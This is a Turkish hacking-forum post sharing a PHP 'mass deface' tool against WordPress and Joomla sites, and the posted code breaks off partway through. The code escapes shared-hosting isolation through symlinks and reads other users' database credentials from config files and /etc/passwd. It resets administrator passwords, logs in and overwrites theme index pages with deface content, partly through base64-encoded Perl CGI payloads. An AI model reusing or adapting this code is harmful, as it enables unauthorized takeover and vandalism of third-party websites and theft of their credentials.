İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Wordpress & Joomla Mass Deface

04-07-2013 00:20
#1
Special Player - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2013
Nereden:
Love MyBB
Mesajlar:
259
Teşekkür (Etti):
1
Teşekkür (Aldı):
44
Konular:
101
Ticaret:
(0) %

Wordpress ve joomla siteleri için mass defacer dökümanını gördüm sizinle paylaşmak istedim

kodlar burda mevcuttur tıklayıp kodları alabilirsiniz http://www.gawfco.com/c.txt


Kod:
<?php
error_reporting(0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
    $ar0=explode($marqueurDebutLien, $text);
    $ar1=explode($marqueurFinLien, $ar0[$i]);
    return trim($ar1[0]);
}

function randomt() {
    $chars = "abcdefghijkmnopqrstuvwxyz023456789";
    srand((double)microtime()*1000000);
    $i = 0;
    $pass = '';
    while ($i <= 7) {
        $num = rand() % 33;
        $tmp = substr($chars, $num, 1);
        $pass = $pass . $tmp;
        $i++;
    }
    return $pass;
}

function index_changer_wp($conf, $content) {
    $output = '';
    $dol = '$';
    $go = 0;
    $username = entre2v2($conf,"define('DB_USER', '","');");
    $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
    $dbname = entre2v2($conf,"define('DB_NAME', '","');");
    $prefix = entre2v2($conf,$dol."table_prefix  = '","'");
    $host = entre2v2($conf,"define('DB_HOST', '","');");

    $link=mysql_connect($host,$username,$password);
    if($link) {
        mysql_select_db($dbname,$link) ;
        $dol = '$';
        $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
    } else {
        $output.= "[-] DB Error<br />";
    }
    if($req1) {

        $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
        $data = mysql_fetch_array($req);
        $site_url=$data["option_value"]; 

        $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='template'");
        $data = mysql_fetch_array($req);
        $template = $data["option_value"];

        $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='current_theme'");
        $data = mysql_fetch_array($req);
        $current_theme = $data["option_value"];

        $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
        $url2=$site_url."/wp-login.php";

        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url2);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
        curl_setopt($ch, CURLOPT_FOLLOW********, 1);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
        curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
        $buffer = curl_exec($ch);

        $pos = strpos($buffer,"action=logout");
        if($pos === false) {
$output.= "[-] Login Error<br />";
        } else {
$output.= "[+] Login Successful<br />";
$go = 1;
        }
        if($go) {
$cond = 0;
$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOW********, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
$buffer0 = curl_exec($ch);

$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');

if(substr_count($_file,"/index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Updated Successfuly<br />";
$hk = explode('public_html',$_file);
$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
$cond = 1;
}
} else {
$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOW********, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
$buffer0 = curl_exec($ch);

$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');

if(substr_count($_file,"index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
    $output.= "[-] Updating Index.php Error<br />";
} else {
    $output.= "[+] Index.php Template Updated Successfuly<br />";
    $output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
    $cond = 1;
}
} else {
$output.= "[-] index.php can not load in Theme Editor<br />";
}
}
        }
    } else {
        $output.= "[-] DB Error<br />";
    }
    global $base_path;
    unlink($base_path.'cookie.txt');
    return array('cond'=>$cond, 'output'=>$output);
}

function index_changer_joomla($conf, $content, $domain) {
    $doler = '$';
    $username = entre2v2($conf, $doler."user = '", "';");
    $password = entre2v2($conf, $doler."password = '", "';");
    $dbname = entre2v2($conf, $doler."db = '", "';");
    $prefix = entre2v2($conf, $doler."dbprefix = '", "';");
    $host = entre2v2($conf, $doler."host = '","';");
    $co=randomt();
    $site_url = "http://".$domain."/administrator";
    $output = '';
    $cond = 0; 
    $link=mysql_connect($host, $username, $password);
    if($link) {
        mysql_select_db($dbname,$link) ;
        $req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
        $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
    } else {
        $output.= "[-] DB Error<br />";
    }
    
    if($req1){
        if ($req) {
$req = mysql_query("SELECT * from  `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
$data = mysql_fetch_array($req);
$template_name = $data["template"];

$req = mysql_query("SELECT * from  `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
$data = mysql_fetch_array($req);
$template_id = $data["extension_id"];

$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);

if($return && $hidden) {
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_REFERER, $url2);
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}
if($pos){
$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);

$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
if($hidden2) {
$output.= "[+] index.php file found in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}
if($hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<dd class="message message">');
$cond = 0;
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
   
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond = 1;
}
}
        } 
        else {
$req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);

if($hidden) {
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}

if($pos) {
$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
if($hidden2) {
$output.= "[+] index.php file founded in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}

if($hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<dd class="message message fade">');
$cond = 0;
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond = 1;
}
}
        }
    } else {
        $output.= "[-] DB Error<br />";
    }
    global $base_path;
    unlink($base_path.$co);
    return array('cond'=>$cond, 'output'=>$output); 
}

function exec_mode_1($def_url, $hacker) {

    @mkdir('sym',0777);
    $wr  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
    $fp = @fopen ('sym/.htaccess','w');
    fwrite($fp, $wr);
    @symlink('/','sym/root');
    $dominios = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
    $out[1] = array_unique($out[1]);
    $numero_dominios = count($out[1]);
    echo "Total domains: $numero_dominios <br><br />";
    $def = file_get_contents($def_url);
    $def = urlencode($def);
    $dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5uZXQvZGV​mYWNlZC8yMDEzLzAxLzEzL2JhbHRzdHVkaW8ubHQvaW5kZXguaHRtbCcpOw0KJHAgPSBleHBsb2RlKCd​wdWJsaWNfaHRtbCcsZGlybmFtZShfX0ZJTEVfXykpOw0KJHAgPSAkcFswXS4ncHVibGljX2h0bWwnOw0​KaWYgKCRoYW5kbGUgPSBvcGVuZGlyKCRwKSkgew0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5​odG1sJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHA​uJy9pbmRleC5waHAnLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgJGZwMSA9IEB​mb3BlbigkcC4nL2luZGV4Lmh0bScsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICB​lY2hvICdEb25lJzsNCn0NCmNsb3NlZGlyKCRoYW5kbGUpOw0KdW5saW5rKF9fRklMRV9fKTsNCj8+';
    $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
    $output = fopen('defaced.html', 'a+');
    $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
    $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    $j = 1;
    $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
    for($i = $st; $i <= $numero_dominios; $i++)
    {
        $domain = $out[1][$i];
        $dono_arquivo = @fileowner("/etc/valiases/".$domain);
        $infos = @posix_getpwuid($dono_arquivo);
        
        if($infos['name']!='root') {
$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");

$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
        
if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count1'] = $_SESSION['count1'] + 1;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}

if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $dd);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config03 && preg_match('/DB_NAME/i',$config03)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config03, $dd);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {    
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
        }
    }
    echo '</table>';
    echo '<hr/>';
    echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';
    echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if($_SESSION['count1']+$_SESSION['count2'] > 0){
        echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}
function exec_mode_2($def_url) {
    
    $domains = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
    $out = array_unique($out[1]);
    $num = count($out);
    print("Total domains: $num<br><br />");
    
    $def = file_get_contents($def_url);
    $def = urlencode($def);
       
    $output = fopen('defaced.html', 'a+');
    $defaced = '';
    $count1 = 0;
    $count2 = 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    $j = 1;
    $map = array();
    foreach($out as $d) {
        $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
        $map[$info['name']] = $d;
    }
    $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcik​gPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
           NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW​1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
           h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltb​GluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
           G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5r​KCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
           YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2N​hbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
           kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQ​pmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
           B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
    mkdir('plsym',0777);
    file_put_contents('plsym/plsym.cc', base64_decode($dt));
    chmod('plsym/plsym.cc', 0755);
    $wr  = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
    $fp = @fopen ('plsym/.htaccess','w');
    fwrite($fp, $wr);
    fclose($fp);
    $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  
    
    $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
    unlink('plsym/plsym.cc');
    $data = file_get_contents($url);
    preg_match_all('/<a href="(.+)">/', $data, $match);
    unset($match[1][0]);
    $i = 1;
    foreach($match[1] as $m)    
    {
        $mz = explode('##',urldecode($m));
        $config01 = '';
        $config02 = '';
        if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
        }
        if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
        }
        $domain = $map[$mz[0]];
        $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
        
        if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }

        if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }
    }
    echo '</table>';
    echo '<hr/>';
    echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
    echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if($count1+$count2 > 0){
        echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}

function exec_mode_3($def_url) {
    
    $domains = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
    $out = array_unique($out[1]);
    $num = count($out);
    print("Total domains: $num<br><br />");
    
    $def = file_get_contents($def_url);
    $def = urlencode($def);
       
    $output = fopen('defaced.html', 'a+');
    $defaced = '';
    $count1 = 0;
    $count2 = 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    $j = 1;
    $map = array();
    foreach($out as $d) {
        $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
        $map[$info['name']] = $d;
    }
    $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcik​gPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
           kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgIC​BzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
           VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogI​CAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
           3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAg​ICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
           cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCc​pOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
           MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID​0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
           R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
    mkdir('plsym',0777);
    file_put_contents('plsym/data.txt', $_POST['man_data']);
    file_put_contents('plsym/plsym.cc', base64_decode($dt));
    chmod('plsym/plsym.cc', 0755);
    $wr  = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
    $fp = @fopen ('plsym/.htaccess','w');
    fwrite($fp, $wr);
    fclose($fp);
    $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  
    
    $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
    unlink('plsym/plsym.cc');
    $data = file_get_contents($url);
    preg_match_all('/<a href="(.+)">/', $data, $match);
    unset($match[1][0]);
    $i=1;
    foreach($match[1] as $m)    
    {
        $mz = explode('##',urldecode($m));
        $config01 = '';
        $config02 = '';
        if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
        }
        if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
        }
        $domain = $map[$mz[0]];
        $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
        
        if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }

        if($config02 && preg_match('/DB_NAME/i',$config02)){
